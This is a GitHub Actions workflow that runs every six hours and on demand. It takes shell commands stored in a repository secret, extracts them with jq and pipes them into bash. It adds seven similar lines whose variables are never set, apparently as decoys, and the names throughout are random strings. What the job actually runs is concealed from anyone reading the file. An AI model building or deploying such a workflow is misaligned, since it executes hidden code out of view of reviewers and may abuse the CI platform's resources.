name: performermushroom
on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: performermushroom
        env:
          obja91: ${{ secrets.obja91 }}
        run: |
          echo $obja91 | jq -r .wm291 | /bin/bash
          echo $boi324 | jq -r .x5 | /bin/bash
          echo $v85 | jq -r .rj33185 | /bin/bash
          echo $re42542 | jq -r .cxow7994 | /bin/bash
          echo $fkcji1445 | jq -r .nmvtt0049 | /bin/bash
          echo $d55890 | jq -r .psqv8 | /bin/bash
          echo $bvm055 | jq -r .fkfe30779 | /bin/bash
          echo $kod54 | jq -r .x0056 | /bin/bash

